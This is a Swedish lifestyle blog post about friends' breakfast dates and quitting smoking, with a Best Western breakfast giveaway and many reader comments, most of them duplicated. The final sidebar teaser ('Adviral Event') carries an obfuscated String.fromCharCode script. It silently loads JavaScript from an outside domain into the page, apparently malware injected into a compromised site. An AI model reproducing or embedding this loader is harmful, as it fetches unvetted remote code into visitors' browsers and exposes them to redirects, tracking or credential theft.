Frukost dejt, mammor emellan…. Plus en TÄVLING!

image

 

Hej fina! Allt bra med dig? Hoppas din helg har varit bra =)

Längst ner i detta inlägget kommer en TÄVLING, där jag i samarbete med Best Western hotell kedja få lotta ut 10 st frukost….. 

Idag skiner solen på Öland/Kalmar.  Nästan så att jag får lite vår känslor…. Ibland hinner jag inte riktigt med mina vänner känns det som. Småbarnslivet, företagandet, träningen, och vardagen tar lixom upp all min tid. Så för att verkligen unna mig lite vardagslyx och kvalitetstid så försöker jag att möta upp mina väninnor på långa frukostdejter. Lite ”sex & the city” känsla, egentid, inga barn, ingen disk att ta hand om…. bara tjejsnack och kaffe 😉 -love it!

image

 

image

 

image image

Min fina Kalmar-fru Sara…. Jag är så tacksam att jag har henne i mitt liv, en väninna som finns där i både med och motvind. Tack fining! <3

image

En trött mamma My…. jaja… ibland är det så… jag har iallafall varit feberfri i snart tre dagar. Dessutom rökfri i 13 dagar! Nu är jag dessvärre i min värsta abstinensperiod hittills. Alla ni som redan en gång har fimpat och slutat röka, NÄR börjar det kännas lättare????

image

 

image

Nu till dagens tävling!

 Nu kan även du njuta av en härlig frukost på Best Western där frukostbordet är fylld till bredden av godsaker. Tio personer kan vinna hotellfrukost på Best Western där Mat-Tina ligger bakom recepten! Tänk att få släppa allt, få två timmar för sig själv, äta gott och dessutom slippa disken! -Bästa känslan!

 Tävla gör du genom att motivera i kommentarsfälten nedan varför just du borde vinna samt dela detta inlägget via facebook. -Glöm inte, tävlar man inte så vinner man inte…… Lycka till! Kramar /My Martens

100 Komentarer

 1. vilken lycka det vore att få vinna en frukost, med småsyskon som tar tiden från mig så hamnar mina stora hjärtan ofta i kläm. Speciellt den stora tjejen, hon skriker av frustration och vill så gärna ha lite egen mammatid. Detta vore perfekta starten för vår mysdagpå stan!
  Håller tummar å tår!

 2. För jag tycker att jag starkt förtjänar det! Jag är en sån där supermom, som håller koll på båda barnen, hela hemmet, alla papper, jobbar heltid, skämmer bort maken och ställer upp för allt och alla. Men jag skulle vilja och behöva tänka på MIG och jag kämpar med att försöka lära mig det, att prioritera mig, ta hand om mig. Så jag skulle förtjäna och behöva en sån frukost, så slipper jag baka, städa undan och göra allt annat än att slappna av. ?

 3. i går var det min födelsedag och planen var en härlig hotellfrukost. Men tyvärr kände jag mig lite risig så det blev ingen tur till Kalmar. Hoppas nu på turen att vinna en härlig frukost. Perfekt present i efterskott

 4. Åh vad jag skulle vilja vinna detta! Och för en gångs skull tävlar jag inte för nån annans skull utan för min egen. Jag är nu gravid med vårt 5e barn på 7år. Och under dom sju åren har jag inte ätit frukost i lugn och ro en endaste gång, självvalt absolut, men oj vad härligt det hade varit att få sitta ner och äta utan att behöva torka barnnäsor, torka upp spill, tvätta någon annans händer eller ha ett barn i knäet! ?

 5. Hej My!
  Jag skulle gärna vilja vinna en frukost tillsammans med min man ?
  Vi båda älskar mat, och fick vi välja skulle vi jämt äta frukost då de är det bästa målet på dagen. De skulle vara jättekul att få testa Best Westerns hotellfrukosten!
  Ha de bra och lycka till med operationen!
  Kram Emilia

 6. Min sambo älskar frukost de är hennes bästa mål på dagen! Och för att överraska henne hade de ju varit super att få gå ut och äta frukost buffé, vi väntar även vårat första barn så hon är mer än värd de! ?

 7. Hej! Är mamma till tvååriga bustrollet ebba och gravid med nummer två, vore underbart mysigt att få vinna och unna sig en mysig långfrukost utan gnäll, fil i håret och flygande halvätna mackor ?

 8. vilken lycka det vore att få vinna en frukost, med småsyskon som tar tiden från mig så hamnar mina stora hjärtan ofta i kläm. Speciellt den stora tjejen, hon skriker av frustration och vill så gärna ha lite egen mammatid. Detta vore perfekta starten för vår mysdagpå stan!
  Håller tummar å tår!

 9. Om 2 månader väntar jag och min sambo vårt första barn. Det hade varit underbart att överraska honom med en lyxig hotellfrukost för oss två, innan vi blir tre.

 10. För jag tycker att jag starkt förtjänar det! Jag är en sån där supermom, som håller koll på båda barnen, hela hemmet, alla papper, jobbar heltid, skämmer bort maken och ställer upp för allt och alla. Men jag skulle vilja och behöva tänka på MIG och jag kämpar med att försöka lära mig det, att prioritera mig, ta hand om mig. Så jag skulle förtjäna och behöva en sån frukost, så slipper jag baka, städa undan och göra allt annat än att slappna av. 🙂

 11. i går var det min födelsedag och planen var en härlig hotellfrukost. Men tyvärr kände jag mig lite risig så det blev ingen tur till Kalmar. Hoppas nu på turen att vinna en härlig frukost. Perfekt present i efterskott

 12. Åh vad jag skulle vilja vinna detta! Och för en gångs skull tävlar jag inte för nån annans skull utan för min egen. Jag är nu gravid med vårt 5e barn på 7år. Och under dom sju åren har jag inte ätit frukost i lugn och ro en endaste gång, självvalt absolut, men oj vad härligt det hade varit att få sitta ner och äta utan att behöva torka barnnäsor, torka upp spill, tvätta någon annans händer eller ha ett barn i knäet! 😉

 13. Åhh, vilken underbar tävling!!
  Jag skulle bjuda med min bror, som bor i Stockholm – ca12mil bort- och därför kan vi inte ses så ofta. Men tänk så härligt att kunna åka och överraska honom med en lyxig långfrukost, där vi bara kan prata i lugn och ro och njuta en stund tillsammans. Jag vet att han inte brukar ”göra sig tid” att äta frukost, så det här vore verkligen ”vardagslyx”!
  Nu håller jag tummarna för vinst ?
  Ha en fin dag My
  Kram

 14. Hej My!

  Jag skulle gärna vilja vinna en frukost tillsammans med min man 🙂
  Vi båda älskar mat, och fick vi välja skulle vi jämt äta frukost då de är det bästa målet på dagen. De skulle vara jättekul att få testa Best Westerns hotellfrukosten!

  Ha de bra och lycka till med operationen!
  Kram Emilia

 15. Min sambo älskar frukost de är hennes bästa mål på dagen! Och för att överraska henne hade de ju varit super att få gå ut och äta frukost buffé, vi väntar även vårat första barn så hon är mer än värd de! 🙂

 16. Hej! Är mamma till tvååriga bustrollet ebba och gravid med nummer två, vore underbart mysigt att få vinna och unna sig en mysig långfrukost utan gnäll, fil i håret och flygande halvätna mackor 🙂

 17. Om 2 månader väntar jag och min sambo vårt första barn. Det hade varit underbart att överraska honom med en lyxig hotellfrukost för oss två, innan vi blir tre.

 18. Åhh, vilken underbar tävling!!

  Jag skulle bjuda med min bror, som bor i Stockholm – ca12mil bort- och därför kan vi inte ses så ofta. Men tänk så härligt att kunna åka och överraska honom med en lyxig långfrukost, där vi bara kan prata i lugn och ro och njuta en stund tillsammans. Jag vet att han inte brukar ”göra sig tid” att äta frukost, så det här vore verkligen ”vardagslyx”!

  Nu håller jag tummarna för vinst 🙂

  Ha en fin dag My
  Kram

 19. jag vill vinna en frukost för att kunna spendera den med dig! Saknar dig min fina vän och vi ses allt för sällan! Bra anledning tycker jag

 20. Ett barn med vattkoppor och ett med maginfluensa och att både sambon och jag fick maginfluensa inatt gör att man lääängtar efter en mysig frukost på tu man hand….

 21. Jag är en väldigt dålig frukostätare, men om vi har nattgäster eller att vi är på semester och bor på hotel ja då älskar jag att sitta läääääänge till frukostbordet och smaka på allt som bjuds, det känns så lyxigt och gott och det bästa med allt är ju att det är pinfärskt bröd och ingen disk för mig att ta hand om, så jag blir ju bara askalasglad om just jag vinner lite lyxfrulle ?
  sol ute sol inne sol i hjärta sol i sinne ? <3

 22. Tränar o är väldigt flitig o noga vad det gäller konst, min kille får testa det ena efter den andra udda maträtten o därför vill jag bjuda mer honom på en underbar frukost där han får äta det han vill äta

 23. jag vill vinna en frukost för att kunna spendera den med dig! Saknar dig min fina vän och vi ses allt för sällan! Bra anledning tycker jag

 24. Ett barn med vattkoppor och ett med maginfluensa och att både sambon och jag fick maginfluensa inatt gör att man lääängtar efter en mysig frukost på tu man hand….

 25. Min fina vän Anette och jag skulle tillbringa tid tillsammans, skratta, prata, vara två vuxna och njuta av långfrukost ihop.

 26. Jag är en väldigt dålig frukostätare, men om vi har nattgäster eller att vi är på semester och bor på hotel ja då älskar jag att sitta läääääänge till frukostbordet och smaka på allt som bjuds, det känns så lyxigt och gott och det bästa med allt är ju att det är pinfärskt bröd och ingen disk för mig att ta hand om, så jag blir ju bara askalasglad om just jag vinner lite lyxfrulle 🙂
  sol ute sol inne sol i hjärta sol i sinne 🙂 <3

 27. Hej My!
  Angående rökabstinens kan jag bara säga att det kommer och går LÄNGE! Så jäkla länge att jag som slutat tre gånger ( längsta uppehållet TRE ÅR!) helt enkelt inte klarat det. Men du verkar vara en superstark tjej som har jävlar anamma nog att fixa det. Men var beredd på att suget sitter i under lång tid. Det har de trixat med och tillsatt en massa skit i tobaken för att göra det svårare att sluta. För 30 år sedan var det bara tobaken man skulle göra sig kvitt, nu är det en massa andra ämnen OCKSÅ!

 28. Tränar o är väldigt flitig o noga vad det gäller konst, min kille får testa det ena efter den andra udda maträtten o därför vill jag bjuda mer honom på en underbar frukost där han får äta det han vill äta

 29. Tycker att man borde tillgöra de lyckligas skara att få en vinstchans för att kunna överraska tonårsdottern med en liten present i form av en stadig frukost

 30. Det skulle vara fantastiskt att få ta med min väninna Camilla på en långfrukost. Vi är båda småbarnsföräldrar med allt vad det innebär. Efter en tuff inskolningsperiod samt massor av VAB kan vi behöva lite tid för skvaller och mys! Sa jag förresten att jag är gravid i vecka 23 och att min väninna fyller år denna veckan? : )

 31. Min fina vän Anette och jag skulle tillbringa tid tillsammans, skratta, prata, vara två vuxna och njuta av långfrukost ihop.

 32. Frukost, brunch, kvalitetstid!
  Höjdpunkten med att bo på hotell är alla underbara hotellfrukostar. Det känns lyxigt att bara komma till dukat bord, lugnt, harmoniskt och ett ställe att fylla på med energi.
  Jag vill vinna för att fylla på med energi, ett ställe där jag kan koppla av och bara vara utan måsten. Där jag kan sitta i lugn och ro i flera timmar utan att behöva tänka på något annat. Fylla på med en god frukost (för helt ärligt, vad är godare än en hotellfrukost)men även lite ”vuxentid”. Jag vill vinna för att fylla magen med en god frukost, få kvalitetstid med min man men även för att varva ner. Det behöver jag.

 33. Hej My!
  Angående rökabstinens kan jag bara säga att det kommer och går LÄNGE! Så jäkla länge att jag som slutat tre gånger ( längsta uppehållet TRE ÅR!) helt enkelt inte klarat det. Men du verkar vara en superstark tjej som har jävlar anamma nog att fixa det. Men var beredd på att suget sitter i under lång tid. Det har de trixat med och tillsatt en massa skit i tobaken för att göra det svårare att sluta. För 30 år sedan var det bara tobaken man skulle göra sig kvitt, nu är det en massa andra ämnen OCKSÅ!

 34. Jag skulle vilja ta med mig min fina familj på en fin Best Western frukost.
  Har en bekant som nyligen förlorade en familjemedlem man blir i all tragik påmind om hur snabbt man kan förlora någon. Känner att detta vore ett bra sätt att samla min familj och tala om hur mycket de betyder för mig och hur mycket jag älskar dem ❤️ Unna oss lite tid med varandra i lugn och ro undan all stress.

 35. Jag vill så gärna vinna en hotellfrukost och överraska mina 2 underbara och duktiga döttrar som pluggar på i högstadiet och gymnasiet. Det skulle bli ett härligt avbrott och lyx i vardagen för dem och mig och en fin present för yngsta dottern som fyller 15 år den 23/2.

 36. Tycker att man borde tillgöra de lyckligas skara att få en vinstchans för att kunna överraska tonårsdottern med en liten present i form av en stadig frukost

 37. Jag skulle vilja vinna en hotellnatt.
  Eftersom jag är hemma rätt mycket med mina tre små barn och aldrig hinner få tid med sambon skulle de vara underbart att få komma bort o ro om varandra.

 38. Det skulle vara fantastiskt att få ta med min väninna Camilla på en långfrukost. Vi är båda småbarnsföräldrar med allt vad det innebär. Efter en tuff inskolningsperiod samt massor av VAB kan vi behöva lite tid för skvaller och mys! Sa jag förresten att jag är gravid i vecka 23 och att min väninna fyller år denna veckan? : )

 39. Frukost, brunch, kvalitetstid!

  Höjdpunkten med att bo på hotell är alla underbara hotellfrukostar. Det känns lyxigt att bara komma till dukat bord, lugnt, harmoniskt och ett ställe att fylla på med energi.

  Jag vill vinna för att fylla på med energi, ett ställe där jag kan koppla av och bara vara utan måsten. Där jag kan sitta i lugn och ro i flera timmar utan att behöva tänka på något annat. Fylla på med en god frukost (för helt ärligt, vad är godare än en hotellfrukost)men även lite ”vuxentid”. Jag vill vinna för att fylla magen med en god frukost, få kvalitetstid med min man men även för att varva ner. Det behöver jag.

 40. Hej!
  I april väntar jag och min käresta en liten flicka och jag skulle så gärna vilja överraska honom med en frukost och lite egentid bara för oss innan det nya livet med en liten börjar. Håller tummarna för att vinna! ?

 41. Skulle gärna vilja vinna och överraska Min kollega med en frukost på hotell .det kan hon behöva efter allt tjafs på jobbet .

 42. Jag skulle vilja ta med mig min fina familj på en fin Best Western frukost.
  Har en bekant som nyligen förlorade en familjemedlem man blir i all tragik påmind om hur snabbt man kan förlora någon. Känner att detta vore ett bra sätt att samla min familj och tala om hur mycket de betyder för mig och hur mycket jag älskar dem ❤️ Unna oss lite tid med varandra i lugn och ro undan all stress.

 43. Som student har man alltid ont om pengar och det hade varit roligt att få unna sig något som man annars aldrig skulle ha råd med.

 44. Jag vill så gärna vinna en hotellfrukost och överraska mina 2 underbara och duktiga döttrar som pluggar på i högstadiet och gymnasiet. Det skulle bli ett härligt avbrott och lyx i vardagen för dem och mig och en fin present för yngsta dottern som fyller 15 år den 23/2.

 45. Jag skulle vilja vinna en hotellnatt.
  Eftersom jag är hemma rätt mycket med mina tre små barn och aldrig hinner få tid med sambon skulle de vara underbart att få komma bort o ro om varandra.

 46. Jag skulle vilja ge min sambo en ordentlig frukost i lugn och ro. Just nu håller han på att renoverar vår källare, det va rätt akut och få det gjort men inte riktigt bra tid ekonomiskt..så han gör allt själv! Såinte nog med att han jobbar heltid och har tvillingar på snart 3 år så går han ner till källaren nästa varje kväll och helg för att fixa! Han är sååå värd en lyxig frukost tycker jag ?

 47. Jag skulle vilja vinna för att bjuda min pojkvän på en härlig helg-upplevelse. Vi lever i ett distansförhållande då vi studerar i olika städer så alla pengar går till själva resandet till varandra, så finns inte så mycket pengar kvar över till att hitta på saker! Det här skulle vara det perfekta myset att överraska med nu när det är alla hjärtans dag på G och vi börjar bli trötta på promenader, filmkvällar osv, ”ge osss lyyyyyx”- känner vi ?

 48. Hej!

  I april väntar jag och min käresta en liten flicka och jag skulle så gärna vilja överraska honom med en frukost och lite egentid bara för oss innan det nya livet med en liten börjar. Håller tummarna för att vinna! 🙂

 49. Skulle gärna vilja vinna och överraska Min kollega med en frukost på hotell .det kan hon behöva efter allt tjafs på jobbet .

 50. Kan inte bestämma vem jag vill bjuda med, antingen en heldag i Kalmar med min man som vi startar med frukost! Eller bjuder jag med min allra riktiga bästa vän, båda är mammor,jobbar och försöker få ihop familjelivet, vi har 10 mil till varandra, så det vore underbart att få en frukostdejt.
  Lycka till på onsdag dom kommer ta väl hand om dig!

 51. Som student har man alltid ont om pengar och det hade varit roligt att få unna sig något som man annars aldrig skulle ha råd med.

 52. Jag skulle vilja ge min sambo en ordentlig frukost i lugn och ro. Just nu håller han på att renoverar vår källare, det va rätt akut och få det gjort men inte riktigt bra tid ekonomiskt..så han gör allt själv! Såinte nog med att han jobbar heltid och har tvillingar på snart 3 år så går han ner till källaren nästa varje kväll och helg för att fixa! Han är sååå värd en lyxig frukost tycker jag 🙂

 53. Jag skulle vilja vinna för att bjuda min pojkvän på en härlig helg-upplevelse. Vi lever i ett distansförhållande då vi studerar i olika städer så alla pengar går till själva resandet till varandra, så finns inte så mycket pengar kvar över till att hitta på saker! Det här skulle vara det perfekta myset att överraska med nu när det är alla hjärtans dag på G och vi börjar bli trötta på promenader, filmkvällar osv, ”ge osss lyyyyyx”- känner vi 🙂

 54. Nikotinet tar ungefär 3 veckor att lämna kroppen så håll ut 8 dagar till så är du helt och hållet nikotinfri. Och med den tanken så lättar även den psykiska abstinensen. 9 månader rökfri e jag:) nu till tävlingen!!:)
  Jag skulle väldigt gärna vilja vinna då både jag och min väldigt nära vän har blivit brutalt dumpade alldeles precis nyss, vi är båda två barns mammor och trodde denna gången att vi hade fått en ”hel” familj igen. Men vi är båda krossade och ensamma och jag känner att komma iväg och rå om varandra och sörja o även få pausen från vardagen som är så välbehövligt skulle göra oss båda väldigt gott. Delat på fb:)

 55. Kan inte bestämma vem jag vill bjuda med, antingen en heldag i Kalmar med min man som vi startar med frukost! Eller bjuder jag med min allra riktiga bästa vän, båda är mammor,jobbar och försöker få ihop familjelivet, vi har 10 mil till varandra, så det vore underbart att få en frukostdejt.

  Lycka till på onsdag dom kommer ta väl hand om dig!

 56. Nikotinet tar ungefär 3 veckor att lämna kroppen så håll ut 8 dagar till så är du helt och hållet nikotinfri. Och med den tanken så lättar även den psykiska abstinensen. 9 månader rökfri e jag:) nu till tävlingen!!:)
  Jag skulle väldigt gärna vilja vinna då både jag och min väldigt nära vän har blivit brutalt dumpade alldeles precis nyss, vi är båda två barns mammor och trodde denna gången att vi hade fått en ”hel” familj igen. Men vi är båda krossade och ensamma och jag känner att komma iväg och rå om varandra och sörja o även få pausen från vardagen som är så välbehövligt skulle göra oss båda väldigt gott. Delat på fb:)

 57. Jag vill vinna en frukost för att kunna ge bort till min sambo som fyller år den 14 mars! ? Och jag hoppas såklart att han tar med mig, om de nu är för två personer? ?

 58. Jag vill vinna en frukost för att kunna ge bort till min sambo som fyller år den 14 mars! 🙂 Och jag hoppas såklart att han tar med mig, om de nu är för två personer? 🙂

 59. Det bästa med att bo på hotell är frukosten. Älskar att äta en härlig hotell frukost.
  Tycker att jag kan vara värd att sätta mig och bara äta. Inte tänka på att ta fram allt och plocka undan efteråt.

 60. Det bästa med att bo på hotell är frukosten. Älskar att äta en härlig hotell frukost.
  Tycker att jag kan vara värd att sätta mig och bara äta. Inte tänka på att ta fram allt och plocka undan efteråt.

 61. Fina My!
  Jag har varit rökfri i lite över fyra månader och är fortfarande sugen ibland. Skitjobbigt!
  Drömmer att jag röker på nätterna mm. ? Så jäkla kontigt. Skit att man började med den här skiten.
  Ang tävlingen: jag skulle vilja ta med min dotter (My) på en långfrukost. Hon är ett komplext barn med diverse diagnoser och är vår att få med ut ur huset, men om man lockar med nåt att äta så. ? Dessutom älskar vi uppdukad frukost a´la hotellstuk!
  Lycka till med din operation. Spela inte hjälte utan ta all smärtlindring du kan få.
  Kram

 62. Fina My!
  Jag har varit rökfri i lite över fyra månader och är fortfarande sugen ibland. Skitjobbigt!
  Drömmer att jag röker på nätterna mm. 🙂 Så jäkla kontigt. Skit att man började med den här skiten.

  Ang tävlingen: jag skulle vilja ta med min dotter (My) på en långfrukost. Hon är ett komplext barn med diverse diagnoser och är vår att få med ut ur huset, men om man lockar med nåt att äta så. 🙂 Dessutom älskar vi uppdukad frukost a´la hotellstuk!

  Lycka till med din operation. Spela inte hjälte utan ta all smärtlindring du kan få.
  Kram

 63. Hej My !
  Skulle vilja avnjuta en underbar frukust med min bästa vän <3
  Vi hörs inte varje dag men finns alltid där ändå.
  Vi båda fyller snart 40. Så det vore en god present till oss ?
  Kramar

 64. Hej My !
  Skulle vilja avnjuta en underbar frukust med min bästa vän <3
  Vi hörs inte varje dag men finns alltid där ändå.
  Vi båda fyller snart 40. Så det vore en god present till oss 🙂
  Kramar

 65. Vi har håller på att renovera köket som vi började med före jul så i 2 månader har vi varit utan kök och därför blir det inga superlyxiga frukostar hemma så det hade ju passat perfekt att få unna sig lite frukostlyx såhär i renoveringskaoset ? Vi bor även på samma gata som Best Western här i vår stad så perfekt ?

 66. Vi har håller på att renovera köket som vi började med före jul så i 2 månader har vi varit utan kök och därför blir det inga superlyxiga frukostar hemma så det hade ju passat perfekt att få unna sig lite frukostlyx såhär i renoveringskaoset 🙂 Vi bor även på samma gata som Best Western här i vår stad så perfekt 😉

 67. Har delat på fb, Annica Beda Nilsson.
  Vill gärna ha en trevlig frukost stund med dottern och bara njuta 2 timmar med att äta och slippa stressen från vardagen och speciellt disken! ;D

 68. Har delat på fb, Annica Beda Nilsson.

  Vill gärna ha en trevlig frukost stund med dottern och bara njuta 2 timmar med att äta och slippa stressen från vardagen och speciellt disken! ;D

 69. Stämmer gärna träff med min utflugne son för en lyxig frukoststund i hans studentstad <3
  Multi-Win-win: han får byta korridoren mot Best Western för en morgon och jag får en dag i "stan" – utöver att vi får tid att umgås och prataprataprata!!

 70. Stämmer gärna träff med min utflugne son för en lyxig frukoststund i hans studentstad <3
  Multi-Win-win: han får byta korridoren mot Best Western för en morgon och jag får en dag i "stan" – utöver att vi får tid att umgås och prataprataprata!!

 71. Min pojkvän Kristoffer är militär och just nu befinner han sig i Mali och jobbar för FN och fred. Vet att deras kök inte kommit igång än så de äter frystorkad mat varje dag, när han kommer hem skulle jag vilja bjuda honom på en underbar frukost med bra råvaror och riktig mat!

 72. Min pojkvän Kristoffer är militär och just nu befinner han sig i Mali och jobbar för FN och fred. Vet att deras kök inte kommit igång än så de äter frystorkad mat varje dag, när han kommer hem skulle jag vilja bjuda honom på en underbar frukost med bra råvaror och riktig mat!

 73. Jag vill min man få överraska,
  genom att till Best Western på frukost få traska.
  Att få fira kärleken bara vi två,
  Och under lite ostört prat framtiden spå.
  Tänk vilken mysig start på dagen,
  Både full på kärlek och mätt i magen.

 74. Jag vill min man få överraska,
  genom att till Best Western på frukost få traska.
  Att få fira kärleken bara vi två,
  Och under lite ostört prat framtiden spå.
  Tänk vilken mysig start på dagen,
  Både full på kärlek och mätt i magen.

 75. Ska med dottern iväg och bo på Hotel men vill också mot sonen va snäll, en god frukost bara han och ja skulle passa så bra. Mysigt att rå om dem på tu man hand alla behöver vi lite extra kärlek ibland.

 76. Ska med dottern iväg och bo på Hotel men vill också mot sonen va snäll, en god frukost bara han och ja skulle passa så bra. Mysigt att rå om dem på tu man hand alla behöver vi lite extra kärlek ibland.

 77. Jag skulle vilja bjuda min mamma på någonting, en hotell frukost skulle vara perfekt. Min mamma har hjälpt mig otroligt mycket med allt från skola,jobb och min ekonomi när den varit nere på botten. Så jag tycker att hon förtjänar denna frukost så otroligt mycket.

 78. Åh, det vore rena drömmen att få en lugn frukost och lite vardagslyx! Vill så gärna slippa disken och dessutom få lite större variation än Kalles kaviar och ett kokt ägg… =)

 79. Jag skulle vilja bjuda min mamma på någonting, en hotell frukost skulle vara perfekt. Min mamma har hjälpt mig otroligt mycket med allt från skola,jobb och min ekonomi när den varit nere på botten. Så jag tycker att hon förtjänar denna frukost så otroligt mycket.

 80. Åh, det vore rena drömmen att få en lugn frukost och lite vardagslyx! Vill så gärna slippa disken och dessutom få lite större variation än Kalles kaviar och ett kokt ägg… =)

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/